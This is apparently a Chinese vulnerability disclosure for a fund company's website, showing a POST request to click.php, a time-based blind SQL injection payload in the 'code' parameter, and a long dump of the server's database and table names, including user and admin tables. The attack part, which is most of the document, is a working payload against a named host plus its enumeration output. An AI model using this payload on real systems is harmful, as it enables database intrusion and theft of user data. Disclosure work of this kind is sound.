2015-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-12: 厂商已经主动忽略漏洞,细节向公众公开
rt
POST /click.php HTTP/1.1Content-Length: 153Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://leshi.wy-fund.com:80/Host: leshi.wy-fund.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*code=1&c_id=1&type=4
参数code过滤不严导致注入。
---Parameter: code (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: code=1' AND (SELECT * FROM (SELECT(SLEEP(5)))RhBz) AND 'NMvd'='NMvd&c_id=1&type=4---back-end DBMS: MySQL 5Database: caihui[110 tables]+----------------------------------------------+| assetal || avgrmmonf || benchmark_comparison || bsheet || bsheet_new || bsholding || cfip || cfprofile || cfunds_net_wy || cfunds_net_wy_3 || chgrf || chgrf_f || cihdquote || company_rating_wy || csholding || csrcappfin || curfscode || curnav_der || cxfundname || dernav || dhistory || dhistory_dispara || dispara_fund || downstate || dsmeeting || encurnav_der || etfcrinfo || etfcrstocks || fcmg || fcowner || fcshare || fegather || fhdquote || fholder || fholder_chg || finfo || fparty || fpchg || fratios || fshare || fsmeeting || fund_benchmark || fundbdy || fundda || fundiconvert || fundmg || fundsaiv || fundshare_chg || fundsta || fundtypes || icst || icst_new || ifundos || iport || iport_s || itprofile || jjglr || jjtgr || jjtzbz || jjxldy || jjxljj || lfshare || mfdhispd || mfdhistory || nav || nav_cur || new_funds_index_wy || newsfin || newstext || ntrad || ofip || ofprofile || prizestate || profchg || qdbhold || qdfhold || qdiport || qdshold || rating_wy || risk_assessment_wy || scfp || scfp_new || securitycode || sholding || sholding_s || sqlexecute || symbol_comp || tab_temp_kdj || tab_temp_kdj_lh || temp_aa || temp_bonus || temp_company_stat || temp_fundtype_wy || temp_gr_year || temp_info_new || temp_issue || temp_main_fund || temp_manager_new || temp_manager_performance || temp_nav_cfund || temp_nav_curfund || temp_nav_ofund || temp_nav_strufund || temp_split || temp_status || tradedate || tsmeeting || tstat || unicst_new || uplog |+----------------------------------------------+Database: performance_schema[17 tables]+----------------------------------------------+| cond_instances || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || mutex_instances || performance_timers || rwlock_instances || setup_consumers || setup_instruments || setup_timers || threads |+----------------------------------------------+Database: cqgd[37 tables]+----------------------------------------------+| user || admin_nav || allocator || allocator_copy || articles || articles_cat || attachment || cate || categroy || click_log || company || configure || customer || dev_help || diy_models || filemanager || fotor || friend_link || fund || fund_flash || fundindex_cat || gd_user || index_fund || info || message_board || money || permit || permit_group || plugins || role_permit || single_page || sys_cfg || tel || tjb || user_role || users || wylcb_fund |+----------------------------------------------+Database: mysql[24 tables]+----------------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------+Database: caihui1[228 tables]+----------------------------------------------+| finfo-- || itprofile-20140614 || ofprofile-20140604 || securitycode--- || assetal || assetal_copy || assetal_copy1 || avgrmmonf || benchmark_comparison || bsheet || bsheet_new || bsholding || cfip || cfprofile || cfunds_net_wy || chdquote || chdquote_copy || chgrf || chgrf_20141030 || chgrf_f || cihdquote || cihdquote_copy || company_rating_wy || companycomm || companycomm_bak || csholding || csrcappfin || curfscode || curnav_der || cxfundname || dernav || dhistory || dhistory_dispara || dispara_fund || downstate || dsmeeting || encurnav_der || etfcrinfo || etfcrstocks || fcmg || fcowner || fcshare || fegather || fhdquote || fholder || fholder_chg || finfo || fparty || fpchg || fratios || fshare || fsmeeting || fund_benchmark || fund_diagnose_record || fundbdy || fundda || fundiconvert || fundmg || fundsaiv || fundshare_chg || fundsta || fundtypes || icst || icst_new || ifundos || iport || iport_s || itnews || itprofile || jjglr || jjjj || jjtgr || jjtzbz || jjxldy || jjxljj || jjzx || lfshare || mfdhispd || mfdhistory || nav || nav_cur || new_funds_index_wy || new_funds_index_wy_1121 || new_funds_index_wy_2 || new_funds_index_wy_3 || new_funds_index_wy_4 || newsauth || newsfin || newsindus || newstext || newstype || ntrad || ofip || ofprofile || p_record || prizestate || profchg || qdbhold || qdfhold || qdiport || qdshold || rating_wy || risk_assessment_wy || scfp || scfp_new || scstc || securitycode || securitycode_copy || sholding || sholding_s || sqlexecute || symbol_comp || tab_comp_kdj || tab_comp_logrecorder || tab_comp_ma || tab_comp_ma_120 || tab_comp_ma_120_bak || tab_comp_macd || tab_comp_rsi || tab_comp_symbol || tab_comp_temp_kdj_lh || tab_comp_temp_lh || tab_comp_uplog || tab_dxfzbj || tab_fixedinvestment || tab_gptj_chang || tab_gptj_duan || tab_gptj_mc || tab_gptj_zhong || tab_invest_reinforcement || tab_invest_wave_band || tab_jmtj || tab_jmtj_chang || tab_jmtj_duan || tab_jmtj_mc || tab_jmtj_mc_copy || tab_jmtj_zhong || tab_new_jjld || tab_new_jjyj || tab_new_nxyj || tab_pzx || tab_recommendlog || tab_symbol_rank || tab_tg_flmc || tab_tg_jjtj || tab_tg_jjyj || tab_tg_nxyj || table07051 || table07052 || table07053 || table1 || table2 || table3 || tablehy07051 || tablehy07052 || tablehy07053 || tablehy1 || tablehy2 || tablehy3 || tablez07051 || tablez07052 || tablez07053 || tablez1 || tablez2 || tablez3 || temp_aa || temp_asset || temp_bb || temp_bonus || temp_bonus_jj || temp_buy_info || temp_company_stat || temp_fundtype_wy || temp_gr_last || temp_gr_year || temp_info_new || temp_info_new_jj || temp_issue || temp_issue_jj || temp_main_fund || temp_manager_new || temp_manager_new_jj || temp_manager_performance || temp_manager_performance_jj || temp_nav_cfund || temp_nav_cfund_jj || temp_nav_curfund || temp_nav_curfund_jj || temp_nav_ofund || temp_nav_ofund_jj || temp_nav_strufund || temp_nav_strufund_jj || temp_split || temp_split_jj || temp_status || temp_status_jj || temp_stock_chg || temp_stock_chg_jj || temp_stock_chg_test || temp_stock_list || temp_stock_list_jj || tradedate || tsmeeting || tstat || unicst_new || uplog || v9_symbols || wy_tab_gp_mothlow || wy_tab_gp_quarter || wy_tab_gp_symbol || wy_tab_gp_week || wy_tab_gp_week_h || wycf_zq_howbuy_fbnav || wycf_zq_howbuy_kfnav || wycf_zq_howbuy_ph || wycf_zq_howbuy_ph_hb || wycf_zq_nav || wycf_zq_sina_hbfund || wycf_zq_sina_ph || wycf_zq_temp_fhb || wycf_zq_temp_hb || wycf_zq_temp_nav_hbfund || wycf_zq_temp_nav_ofund || wycf_zq_temp_ph || wycf_zq_tt_ofund || wycf_zq_tt_ph_kf || wycf_zq_tttempzhishu || wycf_zq_zhishu |+----------------------------------------------+Database: information_schema[37 tables]+----------------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+----------------------------------------------+
过滤
未能联系到厂商或者厂商积极拒绝
